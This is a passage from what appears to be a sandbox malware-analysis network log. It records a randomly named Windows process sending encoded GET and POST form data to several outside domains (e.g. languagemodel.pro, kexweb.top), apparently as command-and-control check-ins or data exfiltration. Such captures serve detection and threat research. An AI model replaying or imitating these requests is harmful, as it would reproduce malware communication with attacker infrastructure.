                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 42 39 78 6c 4b 4c 50 68 52 44 69 68 54 43 49 34 46 61 78 4f 58 65 4c 51 77 6c 77 4c 74 62 78 6e 39 37 6d 47 78 31 79 44 43 58 6e 36 62 4c 62 57 52 4a 6b 50 52 36 77 7a 58 52 77 6f 48 4d 52 41 65 65 30 4b 4b 65 58 76 61 39 7a 53 43 30 63 44 38 56 65 79 6a 6e 35 4d 70 4c 50 62 61 52 74 34 63 5a 39 34 6d 2b 56 6a 53 74 4c 46 7a 6c 6d 50 75 61 6e 6e 52 66 62 2f 67 71 39 4a 57 2f 4c 5a 49 6a 65 6b 4d 43 63 51 75 5a 41 48 39 6a 76 58 69 33 30 58 4a 2b 64 59 4d 69 6d 4c 38 69 58 6f 6c [TRUNCATED]
                                              Data Ascii: 7lpPGx= [TRUNCATED]
                                              Sep 25, 2024 11:37:49.179666042 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 09:37:49 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.7 | 52115 | 172.96.191.39 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:37:50.812529087 CEST | 572 | OUT | GET /3qit/?7lpPGx=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQxg90ohUPLnuDBmcV/JKR3qQ6hCHukB1vPlSHURbGTm5jGBVUo3vRYYo&QF4tL=lBP8AZrpnb HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.bola88site.one
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:37:51.714113951 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 09:37:51 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.7 | 52116 | 217.70.184.50 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:37:56.961630106 CEST | 841 | OUT | POST /nxfn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.languagemodel.pro
                                              Origin: http://www.languagemodel.pro
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.languagemodel.pro/nxfn/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 64 55 64 5a 71 6f 51 70 6c 49 64 45 38 35 46 5a 65 75 35 51 74 79 4f 42 36 56 48 38 49 53 7a 59 6e 66 41 76 4e 73 52 36 4e 35 75 58 69 69 4c 44 43 41 3d 3d
                                              Data Ascii: 7lpPGx=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdUdZqoQplIdE85FZeu5QtyOB6VH8ISzYnfAvNsR6N5uXiiLDCA==
                                              Sep 25, 2024 11:37:57.561903954 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:37:57 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.7 | 52117 | 217.70.184.50 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:37:59.505280018 CEST | 861 | OUT | POST /nxfn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.languagemodel.pro
                                              Origin: http://www.languagemodel.pro
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.languagemodel.pro/nxfn/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 32 36 2b 58 6a 4b 66 30 75 74 6c 65 45 33 41 4f 6c 62 53 4f 4c 39 76 77 71 48 55 31 7a 49 79 6d 46 4a 6a 39 55 6d 75 7a 68 55 43 5a 33 54 4c 41 63 3d
                                              Data Ascii: 7lpPGx=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zj26+XjKf0utleE3AOlbSOL9vwqHU1zIymFJj9UmuzhUCZ3TLAc=
                                              Sep 25, 2024 11:38:00.093703985 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:38:00 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.2.7 | 52118 | 217.70.184.50 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:02.053656101 CEST | 1874 | OUT | POST /nxfn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.languagemodel.pro
                                              Origin: http://www.languagemodel.pro
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.languagemodel.pro/nxfn/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx= [TRUNCATED]
                                              Sep 25, 2024 11:38:02.650785923 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:38:02 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.2.7 | 52119 | 217.70.184.50 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:04.594868898 CEST | 575 | OUT | GET /nxfn/?QF4tL=lBP8AZrpnb&7lpPGx=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.languagemodel.pro
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:38:05.211067915 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:38:05 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Language
                                              Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
                                              Sep 25, 2024 11:38:05.211108923 CEST | 914 | IN | Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              17 | 192.168.2.7 | 52120 | 63.250.47.40 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:10.999030113 CEST | 820 | OUT | POST /3bdq/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.kexweb.top
                                              Origin: http://www.kexweb.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.kexweb.top/3bdq/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2NkxlqgwF+JmUv7iZcsxSHAJLrojbqbyKVr8mr0I/FyJO5M7AuaqDyw==
                                              Sep 25, 2024 11:38:11.585447073 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:11 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 389
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.2.7 | 52121 | 63.250.47.40 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:13.554080963 CEST | 840 | OUT | POST /3bdq/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.kexweb.top
                                              Origin: http://www.kexweb.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.kexweb.top/3bdq/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15bguZW8CNhTp1MnIQ9vm7eqjILHkPsW7nGnwY0MY+/l5FrNVJE=
                                              Sep 25, 2024 11:38:14.144331932 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:14 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 389
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              19 | 192.168.2.7 | 52122 | 63.250.47.40 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:16.105684996 CEST | 1853 | OUT | POST /3bdq/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.kexweb.top
                                              Origin: http://www.kexweb.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.kexweb.top/3bdq/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx= [TRUNCATED]
                                              Sep 25, 2024 11:38:16.688536882 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:16 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 389
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.2.7 | 52123 | 63.250.47.40 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
